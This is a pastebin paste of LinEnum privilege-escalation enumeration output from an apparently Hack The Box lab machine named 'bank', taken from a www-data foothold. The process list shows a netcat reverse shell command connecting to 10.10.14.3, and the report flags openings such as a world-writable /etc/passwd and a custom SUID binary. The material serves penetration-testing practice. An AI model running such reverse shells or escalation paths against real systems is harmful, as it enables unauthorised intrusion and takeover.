API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 18th, 2017
394
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.30 KB | None | 0 0
raw download clone embed print report
  1.  
  2. #########################################################
  3. # Local Linux Enumeration & Privilege Escalation Script #
  4. #########################################################
  5. # www.rebootuser.com
  6. # 
  7.  
  8. Debug Info
  9. thorough tests = enabled
  10.  
  11.  
  12. Scan started at:
  13. Tue Sep 19 03:15:16 EEST 2017
  14. 
  15.  
  16. ### SYSTEM ##############################################
  17. Kernel information:
  18. Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 i686 i686 GNU/Linux
  19.  
  20.  
  21. Kernel information (continued):
  22. Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017
  23.  
  24.  
  25. Specific release information:
  26. DISTRIB_ID=Ubuntu
  27. DISTRIB_RELEASE=14.04
  28. DISTRIB_CODENAME=trusty
  29. DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
  30. NAME="Ubuntu"
  31. VERSION="14.04.5 LTS, Trusty Tahr"
  32. ID=ubuntu
  33. ID_LIKE=debian
  34. PRETTY_NAME="Ubuntu 14.04.5 LTS"
  35. VERSION_ID="14.04"
  36. HOME_URL="http://www.ubuntu.com/"
  37. SUPPORT_URL="http://help.ubuntu.com/"
  38. BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
  39.  
  40.  
  41. Hostname:
  42. bank
  43.  
  44.  
  45. ### USER/GROUP ##########################################
  46. Current user/group info:
  47. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  48.  
  49.  
  50. Users that have previously logged onto the system:
  51. Username Port From Latest
  52. root tty1 Fri Jun 16 07:44:56 +0300 2017
  53. chris pts/0 192.168.147.1 Sun May 28 22:16:12 +0300 2017
  54.  
  55.  
  56. Who else is logged on:
  57. 03:15:16 up 16:14, 0 users, load average: 0.00, 0.01, 0.00
  58. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  59.  
  60.  
  61. Group memberships:
  62. uid=0(root) gid=0(root) groups=0(root)
  63. uid=1(daemon) gid=1(daemon) groups=1(daemon)
  64. uid=2(bin) gid=2(bin) groups=2(bin)
  65. uid=3(sys) gid=3(sys) groups=3(sys)
  66. uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  67. uid=5(games) gid=60(games) groups=60(games)
  68. uid=6(man) gid=12(man) groups=12(man)
  69. uid=7(lp) gid=7(lp) groups=7(lp)
  70. uid=8(mail) gid=8(mail) groups=8(mail)
  71. uid=9(news) gid=9(news) groups=9(news)
  72. uid=10(uucp) gid=10(uucp) groups=10(uucp)
  73. uid=13(proxy) gid=13(proxy) groups=13(proxy)
  74. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  75. uid=34(backup) gid=34(backup) groups=34(backup)
  76. uid=38(list) gid=38(list) groups=38(list)
  77. uid=39(irc) gid=39(irc) groups=39(irc)
  78. uid=41(gnats) gid=41(gnats) groups=41(gnats)
  79. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  80. uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
  81. uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)
  82. uid=102(messagebus) gid=106(messagebus) groups=106(messagebus)
  83. uid=103(landscape) gid=109(landscape) groups=109(landscape)
  84. uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
  85. uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
  86. uid=105(bind) gid=112(bind) groups=112(bind)
  87. uid=106(mysql) gid=114(mysql) groups=114(mysql)
  88.  
  89.  
  90. Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
  91. root:x:0:0:root:/root:/bin/bash
  92. chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
  93.  
  94.  
  95. Super user account(s):
  96. root
  97.  
  98.  
  99. Are permissions on /home directories lax:
  100. total 12K
  101. drwxr-xr-x 3 root root 4.0K May 28 22:13 .
  102. drwxr-xr-x 21 root root 4.0K Jun 15 08:12 ..
  103. drwxr-xr-x 3 chris chris 4.0K Jun 14 18:21 chris
  104.  
  105.  
  106. Files not owned by user but writable by group:
  107. -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
  108. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
  109. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
  110. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
  111. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
  112. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
  113. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
  114. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
  115. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
  116. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
  117. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
  118. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access
  119.  
  120.  
  121. World-readable files within /home:
  122. -rw-r--r-- 1 chris chris 675 May 28 22:13 /home/chris/.profile
  123. -rw-r--r-- 1 chris chris 3637 May 28 22:13 /home/chris/.bashrc
  124. -rw-rw-r-- 1 chris chris 33 May 29 14:52 /home/chris/user.txt
  125. -rw-r--r-- 1 chris chris 220 May 28 22:13 /home/chris/.bash_logout
  126.  
  127.  
  128. Home directory contents:
  129. total 16K
  130. drwxr-xr-x 4 root root 4.0K May 28 22:48 .
  131. drwxr-xr-x 14 root root 4.0K May 29 18:41 ..
  132. drwxr-xr-x 6 www-data www-data 4.0K Jun 15 09:21 bank
  133. drwxr-xr-x 2 root root 4.0K Jun 14 18:02 html
  134.  
  135.  
  136. Root is allowed to login via SSH:
  137. PermitRootLogin yes
  138.  
  139.  
  140. ### ENVIRONMENTAL #######################################
  141.  Environment information:
  142. APACHE_PID_FILE=/var/run/apache2/apache2.pid
  143. APACHE_RUN_USER=www-data
  144. APACHE_LOG_DIR=/var/log/apache2
  145. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  146. PWD=/var/www/bank/uploads
  147. APACHE_RUN_GROUP=www-data
  148. LANG=C
  149. SHLVL=1
  150. APACHE_LOCK_DIR=/var/lock/apache2
  151. APACHE_RUN_DIR=/var/run/apache2
  152. _=/usr/bin/env
  153.  
  154.  
  155. Path information:
  156. /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  157.  
  158.  
  159. Available shells:
  160. # /etc/shells: valid login shells
  161. /bin/sh
  162. /bin/dash
  163. /bin/bash
  164. /bin/rbash
  165. /usr/bin/tmux
  166. /usr/bin/screen
  167.  
  168.  
  169. Current umask value:
  170. 0022
  171. u=rwx,g=rx,o=rx
  172.  
  173.  
  174. umask value as specified in /etc/login.defs:
  175. UMASK 022
  176.  
  177.  
  178. Password and storage information:
  179. PASS_MAX_DAYS 99999
  180. PASS_MIN_DAYS 0
  181. PASS_WARN_AGE 7
  182. ENCRYPT_METHOD SHA512
  183.  
  184.  
  185. ### JOBS/TASKS ##########################################
  186. Cron jobs:
  187. -rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
  188.  
  189. /etc/cron.d:
  190. total 16
  191. drwxr-xr-x 2 root root 4096 May 28 22:40 .
  192. drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
  193. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
  194. -rw-r--r-- 1 root root 510 Feb 9 2017 php5
  195.  
  196. /etc/cron.daily:
  197. total 76
  198. drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
  199. drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
  200. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
  201. -rwxr-xr-x 1 root root 625 May 9 19:15 apache2
  202. -rwxr-xr-x 1 root root 376 Apr 4 2014 apport
  203. -rwxr-xr-x 1 root root 15481 Apr 10 2014 apt
  204. -rwxr-xr-x 1 root root 314 Feb 18 2014 aptitude
  205. -rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils
  206. -rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg
  207. -rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate
  208. -rwxr-xr-x 1 root root 1261 Sep 23 2014 man-db
  209. -rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate
  210. -rwxr-xr-x 1 root root 249 Feb 17 2014 passwd
  211. -rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest
  212. -rwxr-xr-x 1 root root 214 Oct 7 2014 update-notifier-common
  213. -rwxr-xr-x 1 root root 328 Jul 18 2014 upstart
  214.  
  215. /etc/cron.hourly:
  216. total 12
  217. drwxr-xr-x 2 root root 4096 May 28 21:51 .
  218. drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
  219. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
  220.  
  221. /etc/cron.monthly:
  222. total 12
  223. drwxr-xr-x 2 root root 4096 May 28 21:51 .
  224. drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
  225. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
  226.  
  227. /etc/cron.weekly:
  228. total 28
  229. drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
  230. drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
  231. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
  232. -rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
  233. -rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
  234. -rwxr-xr-x 1 root root 771 Sep 23 2014 man-db
  235. -rwxr-xr-x 1 root root 211 Oct 7 2014 update-notifier-common
  236.  
  237.  
  238. Crontab contents:
  239. # /etc/crontab: system-wide crontab
  240. # Unlike any other crontab you don't have to run the `crontab'
  241. # command to install the new version when you edit this file
  242. # and files in /etc/cron.d. These files also have username fields,
  243. # that none of the other crontabs do.
  244.  
  245. SHELL=/bin/sh
  246. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  247.  
  248. # m h dom mon dow user command
  249. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
  250. 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
  251. 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
  252. 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
  253. #
  254.  
  255.  
  256. ### NETWORKING ##########################################
  257. Network & IP info:
  258. eth0 Link encap:Ethernet HWaddr 00:50:56:aa:b1:0c
  259. inet addr:10.10.10.29 Bcast:10.10.10.255 Mask:255.255.255.0
  260. inet6 addr: fe80::250:56ff:feaa:b10c/64 Scope:Link
  261. inet6 addr: dead:beef::250:56ff:feaa:b10c/64 Scope:Global
  262. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  263. RX packets:6318125 errors:4580 dropped:8585 overruns:0 frame:0
  264. TX packets:6275341 errors:0 dropped:0 overruns:0 carrier:0
  265. collisions:0 txqueuelen:1000
  266. RX bytes:1581182731 (1.5 GB) TX bytes:1177779161 (1.1 GB)
  267. Interrupt:19 Base address:0x2000
  268.  
  269. lo Link encap:Local Loopback
  270. inet addr:127.0.0.1 Mask:255.0.0.0
  271. inet6 addr: ::1/128 Scope:Host
  272. UP LOOPBACK RUNNING MTU:65536 Metric:1
  273. RX packets:3373 errors:0 dropped:0 overruns:0 frame:0
  274. TX packets:3373 errors:0 dropped:0 overruns:0 carrier:0
  275. collisions:0 txqueuelen:1
  276. RX bytes:347776 (347.7 KB) TX bytes:347776 (347.7 KB)
  277.  
  278.  
  279. ARP history:
  280. ? (10.10.10.2) at 00:50:56:aa:e6:4b [ether] on eth0
  281.  
  282.  
  283. Nameserver(s):
  284. nameserver 10.10.10.29
  285. nameserver 192.168.1.7
  286.  
  287.  
  288. Default route:
  289. default 10.10.10.2 0.0.0.0 UG 0 0 0 eth0
  290.  
  291.  
  292. Listening TCP:
  293. Active Internet connections (servers and established)
  294. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  295. tcp 0 0 10.10.10.29:53 0.0.0.0:* LISTEN -
  296. tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
  297. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  298. tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
  299. tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
  300. tcp 0 0 10.10.10.29:41626 10.10.14.3:6969 ESTABLISHED 2203/sh
  301. tcp6 0 0 :::80 :::* LISTEN -
  302. tcp6 0 0 :::53 :::* LISTEN -
  303. tcp6 0 0 :::22 :::* LISTEN -
  304. tcp6 0 0 ::1:953 :::* LISTEN -
  305. tcp6 0 0 10.10.10.29:80 10.10.14.3:57208 TIME_WAIT -
  306. tcp6 0 0 10.10.10.29:80 10.10.14.3:57204 TIME_WAIT -
  307. tcp6 0 0 10.10.10.29:80 10.10.14.3:57168 ESTABLISHED -
  308.  
  309.  
  310. Listening UDP:
  311. Active Internet connections (servers and established)
  312. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  313. udp 0 0 10.10.10.29:53 0.0.0.0:* -
  314. udp 0 0 127.0.0.1:53 0.0.0.0:* -
  315. udp6 0 0 :::53 :::* -
  316.  
  317.  
  318. ### SERVICES #############################################
  319. Running processes:
  320. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  321. root 1 0.0 0.2 4312 2508 ? Ss Sep18 0:01 /sbin/init
  322. root 2 0.0 0.0 0 0 ? S Sep18 0:00 [kthreadd]
  323. root 3 0.0 0.0 0 0 ? S Sep18 0:50 [ksoftirqd/0]
  324. root 5 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:0H]
  325. root 7 0.0 0.0 0 0 ? S Sep18 0:02 [rcu_sched]
  326. root 8 0.0 0.0 0 0 ? S Sep18 0:00 [rcu_bh]
  327. root 9 0.0 0.0 0 0 ? S Sep18 0:00 [migration/0]
  328. root 10 0.0 0.0 0 0 ? S Sep18 0:00 [watchdog/0]
  329. root 11 0.0 0.0 0 0 ? S Sep18 0:00 [kdevtmpfs]
  330. root 12 0.0 0.0 0 0 ? S< Sep18 0:00 [netns]
  331. root 13 0.0 0.0 0 0 ? S< Sep18 0:00 [perf]
  332. root 14 0.0 0.0 0 0 ? S Sep18 0:00 [khungtaskd]
  333. root 15 0.0 0.0 0 0 ? S< Sep18 0:00 [writeback]
  334. root 16 0.0 0.0 0 0 ? SN Sep18 0:00 [ksmd]
  335. root 17 0.0 0.0 0 0 ? SN Sep18 0:00 [khugepaged]
  336. root 18 0.0 0.0 0 0 ? S< Sep18 0:00 [crypto]
  337. root 19 0.0 0.0 0 0 ? S< Sep18 0:00 [kintegrityd]
  338. root 20 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  339. root 21 0.0 0.0 0 0 ? S< Sep18 0:00 [kblockd]
  340. root 22 0.0 0.0 0 0 ? S< Sep18 0:00 [ata_sff]
  341. root 23 0.0 0.0 0 0 ? S< Sep18 0:00 [md]
  342. root 24 0.0 0.0 0 0 ? S< Sep18 0:00 [devfreq_wq]
  343. root 26 0.0 0.0 0 0 ? S Sep18 0:06 [kworker/0:1]
  344. root 28 0.0 0.0 0 0 ? S Sep18 0:01 [kswapd0]
  345. root 29 0.0 0.0 0 0 ? S< Sep18 0:00 [vmstat]
  346. root 30 0.0 0.0 0 0 ? S Sep18 0:00 [fsnotify_mark]
  347. root 31 0.0 0.0 0 0 ? S Sep18 0:00 [ecryptfs-kthrea]
  348. root 47 0.0 0.0 0 0 ? S< Sep18 0:00 [kthrotld]
  349. root 48 0.0 0.0 0 0 ? S< Sep18 0:00 [acpi_thermal_pm]
  350. root 49 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  351. root 50 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  352. root 52 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  353. root 53 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  354. root 54 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  355. root 55 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  356. root 56 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  357. root 57 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  358. root 58 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_0]
  359. root 59 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_0]
  360. root 60 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_1]
  361. root 61 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_1]
  362. root 64 0.0 0.0 0 0 ? S< Sep18 0:00 [ipv6_addrconf]
  363. root 77 0.0 0.0 0 0 ? S< Sep18 0:00 [deferwq]
  364. root 78 0.0 0.0 0 0 ? S< Sep18 0:00 [charger_manager]
  365. root 80 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  366. root 81 0.0 0.0 0 0 ? S Sep18 0:00 [kworker/0:2]
  367. root 136 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:1H]
  368. root 137 0.0 0.0 0 0 ? S< Sep18 0:00 [kpsmoused]
  369. root 138 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt_poll_0]
  370. root 139 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt/0]
  371. root 141 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_2]
  372. root 142 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_2]
  373. root 143 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
  374. root 169 0.0 0.0 0 0 ? S Sep18 0:00 [jbd2/sda1-8]
  375. root 170 0.0 0.0 0 0 ? S< Sep18 0:00 [ext4-rsv-conver]
  376. root 299 0.0 0.1 3160 1312 ? S Sep18 0:00 upstart-udev-bridge --daemon
  377. root 303 0.0 0.1 12356 1948 ? Ss Sep18 0:00 /lib/systemd/systemd-udevd --daemon
  378. message+ 366 0.0 0.1 4268 1144 ? Ss Sep18 0:00 dbus-daemon --system --fork
  379. root 393 0.0 0.1 3996 1664 ? Ss Sep18 0:00 /lib/systemd/systemd-logind
  380. syslog 407 0.0 0.1 30492 1780 ? Ssl Sep18 0:00 rsyslogd
  381. root 436 0.0 0.1 3164 1044 ? S Sep18 0:00 upstart-file-bridge --daemon
  382. root 479 0.0 0.0 0 0 ? S< Sep18 0:00 [ttm_swap]
  383. root 649 0.0 0.0 2888 4 ? S Sep18 0:00 upstart-socket-bridge --daemon
  384. root 781 0.0 0.1 4660 1728 tty4 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty4
  385. root 784 0.0 0.1 4660 1688 tty5 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty5
  386. root 789 0.0 0.1 4660 1724 tty2 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty2
  387. root 790 0.0 0.1 4660 1732 tty3 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty3
  388. root 793 0.0 0.1 4660 1592 tty6 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty6
  389. root 826 0.0 0.2 7828 2760 ? Ss Sep18 0:00 /usr/sbin/sshd -D
  390. daemon 827 0.0 0.0 2656 0 ? Ss Sep18 0:00 atd
  391. root 828 0.0 0.1 3068 1904 ? Ss Sep18 0:00 cron
  392. root 875 0.0 0.1 2212 1356 ? Ss Sep18 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
  393. mysql 909 0.0 3.4 327756 35612 ? Ssl Sep18 0:23 /usr/sbin/mysqld
  394. bind 936 0.0 1.3 46152 13416 ? Ssl Sep18 0:01 /usr/sbin/named -u bind
  395. root 1025 0.0 1.6 103516 16616 ? Ss Sep18 0:03 /usr/sbin/apache2 -k start
  396. www-data 1028 0.0 0.3 21540 3544 ? S Sep18 0:01 /usr/sbin/apache2 -k start
  397. root 1074 0.0 0.1 4660 1824 tty1 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty1
  398. root 1197 0.0 0.0 0 0 ? S Sep18 0:00 [kauditd]
  399. www-data 2047 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  400. www-data 2061 0.0 0.9 103604 9428 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  401. www-data 2065 0.0 1.1 103720 11348 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  402. www-data 2111 0.0 1.0 103736 10768 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  403. www-data 2116 0.0 0.6 103596 6864 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  404. www-data 2119 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  405. www-data 2124 0.0 0.9 103596 9568 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  406. www-data 2132 0.0 0.9 103588 9816 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  407. www-data 2164 0.0 0.9 103588 9812 ? S 02:17 0:00 /usr/sbin/apache2 -k start
  408. www-data 2177 0.0 1.0 103588 10360 ? S 02:19 0:00 /usr/sbin/apache2 -k start
  409. root 2198 0.0 0.0 0 0 ? S 02:54 0:00 [kworker/u16:0]
  410. root 2201 0.0 0.0 0 0 ? S 03:02 0:00 [kworker/u16:2]
  411. www-data 2202 0.0 0.0 2284 628 ? S 03:06 0:00 sh -c nc -e /bin/sh 10.10.14.3 6969
  412. www-data 2203 0.0 0.1 2284 1368 ? S 03:06 0:00 sh
  413. www-data 3430 0.3 0.2 3512 2840 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
  414. www-data 3762 0.0 0.1 3504 1956 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
  415. www-data 3763 0.0 0.1 3156 1968 ? R 03:15 0:00 ps aux
  416.  
  417.  
  418. Process binaries & associated permissions (from above list):
  419. -rwxr-xr-x 1 root root 986672 May 16 15:54 /bin/bash
  420. -rwxr-xr-x 1 root root 259552 Feb 7 2017 /lib/systemd/systemd-logind
  421. -rwxr-xr-x 1 root root 235064 Feb 7 2017 /lib/systemd/systemd-udevd
  422. -rwxr-xr-x 2 root root 26756 Nov 24 2016 /sbin/getty
  423. -rwxr-xr-x 1 root root 252080 Jul 18 2014 /sbin/init
  424. -rwxr-xr-x 1 root root 597796 May 9 19:16 /usr/sbin/apache2
  425. -rwxr-xr-x 1 root root 10724544 Apr 25 19:57 /usr/sbin/mysqld
  426. -rwxr-xr-x 1 root root 573516 Apr 13 11:12 /usr/sbin/named
  427. -rwxr-xr-x 1 root root 834648 Aug 11 2016 /usr/sbin/sshd
  428.  
  429.  
  430. /etc/init.d/ binary permissions:
  431. total 200
  432. drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
  433. drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
  434. -rw-r--r-- 1 root root 0 Aug 3 2016 .legacy-bootordering
  435. -rw-r--r-- 1 root root 2427 Mar 13 2014 README
  436. -rwxr-xr-x 1 root root 2243 Apr 3 2014 acpid
  437. -rwxr-xr-x 1 root root 9974 Jan 7 2014 apache2
  438. -rwxr-xr-x 1 root root 4125 Mar 16 2017 apparmor
  439. -rwxr-xr-x 1 root root 2801 May 18 2016 apport
  440. -rwxrwxr-x 1 root root 1071 Sep 8 2013 atd
  441. -rwxr-xr-x 1 root root 3451 Apr 13 11:07 bind9
  442. -rwxr-xr-x 1 root root 1919 Jan 18 2011 console-setup
  443. lrwxrwxrwx 1 root root 21 May 28 21:51 cron -> /lib/init/upstart-job
  444. -rwxr-xr-x 1 root root 2813 Nov 25 2014 dbus
  445. -rwxr-xr-x 1 root root 1217 Mar 7 2013 dns-clean
  446. lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
  447. -rwxr-xr-x 1 root root 1105 May 13 2015 grub-common
  448. -rwxr-xr-x 1 root root 1329 Mar 13 2014 halt
  449. -rwxr-xr-x 1 root root 1864 Nov 12 2012 irqbalance
  450. -rwxr-xr-x 1 root root 1293 Mar 13 2014 killprocs
  451. -rwxr-xr-x 1 root root 1990 Jan 22 2013 kmod
  452. -rwxr-xr-x 1 root root 5491 Feb 19 2014 mysql
  453. -rwxr-xr-x 1 root root 4479 Mar 20 2014 networking
  454. -rwxr-xr-x 1 root root 1581 Feb 17 2016 ondemand
  455. -rwxr-xr-x 1 root root 561 Apr 21 2015 pppd-dns
  456. -rwxr-xr-x 1 root root 1192 May 27 2013 procps
  457. -rwxr-xr-x 1 root root 6120 Mar 13 2014 rc
  458. -rwxr-xr-x 1 root root 782 Mar 13 2014 rc.local
  459. -rwxr-xr-x 1 root root 117 Mar 13 2014 rcS
  460. -rwxr-xr-x 1 root root 639 Mar 13 2014 reboot
  461. -rwxr-xr-x 1 root root 2918 Jun 13 2014 resolvconf
  462. -rwxr-xr-x 1 root root 4395 Jan 20 2016 rsync
  463. -rwxr-xr-x 1 root root 2913 Dec 4 2013 rsyslog
  464. -rwxr-xr-x 1 root root 1226 Jul 22 2013 screen-cleanup
  465. -rwxr-xr-x 1 root root 3920 Mar 13 2014 sendsigs
  466. -rwxr-xr-x 1 root root 590 Mar 13 2014 single
  467. -rw-r--r-- 1 root root 4290 Mar 13 2014 skeleton
  468. -rwxr-xr-x 1 root root 4077 May 2 2014 ssh
  469. -rwxr-xr-x 1 root root 731 Feb 5 2014 sudo
  470. -rwxr-xr-x 1 root root 6173 Apr 14 2014 udev
  471. -rwxr-xr-x 1 root root 2721 Mar 13 2014 umountfs
  472. -rwxr-xr-x 1 root root 2260 Mar 13 2014 umountnfs.sh
  473. -rwxr-xr-x 1 root root 1872 Mar 13 2014 umountroot
  474. -rwxr-xr-x 1 root root 1361 Dec 6 2013 unattended-upgrades
  475. -rwxr-xr-x 1 root root 3111 Mar 13 2014 urandom
  476.  
  477.  
  478. ### SOFTWARE #############################################
  479. Sudo version:
  480. Sudo version 1.8.9p5
  481.  
  482.  
  483. MYSQL version:
  484. mysql Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3
  485.  
  486.  
  487. Apache version:
  488. Server version: Apache/2.4.7 (Ubuntu)
  489. Server built: May 9 2017 16:13:38
  490.  
  491.  
  492. Apache user configuration:
  493. APACHE_RUN_USER=www-data
  494. APACHE_RUN_GROUP=www-data
  495.  
  496.  
  497. Installed Apache modules:
  498. Loaded Modules:
  499. core_module (static)
  500. so_module (static)
  501. watchdog_module (static)
  502. http_module (static)
  503. log_config_module (static)
  504. logio_module (static)
  505. version_module (static)
  506. unixd_module (static)
  507. access_compat_module (shared)
  508. alias_module (shared)
  509. auth_basic_module (shared)
  510. authn_core_module (shared)
  511. authn_file_module (shared)
  512. authz_core_module (shared)
  513. authz_host_module (shared)
  514. authz_user_module (shared)
  515. autoindex_module (shared)
  516. deflate_module (shared)
  517. dir_module (shared)
  518. env_module (shared)
  519. fcgid_module (shared)
  520. filter_module (shared)
  521. include_module (shared)
  522. mime_module (shared)
  523. mpm_prefork_module (shared)
  524. negotiation_module (shared)
  525. php5_module (shared)
  526. rewrite_module (shared)
  527. setenvif_module (shared)
  528. status_module (shared)
  529. suexec_module (shared)
  530.  
  531.  
  532. ### INTERESTING FILES ####################################
  533. Useful file locations:
  534. /bin/nc
  535. /bin/netcat
  536. /usr/bin/wget
  537. /usr/bin/nmap
  538. /usr/bin/gcc
  539.  
  540.  
  541. Installed compilers:
  542. ii g++ 4:4.8.2-1ubuntu6 i386 GNU C++ compiler
  543. ii g++-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C++ compiler
  544. ii gcc 4:4.8.2-1ubuntu6 i386 GNU C compiler
  545. ii gcc-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C compiler
  546.  
  547.  
  548. Can we read/write sensitive files:
  549. -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
  550. -rw-r--r-- 1 root root 707 May 28 22:40 /etc/group
  551. -rw-r--r-- 1 root root 665 Feb 20 2014 /etc/profile
  552. -rw-r----- 1 root shadow 895 Jun 14 18:16 /etc/shadow
  553.  
  554.  
  555. SUID files:
  556. -rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
  557. -rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
  558. -rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
  559. -rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  560. -rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
  561. -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
  562. -rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
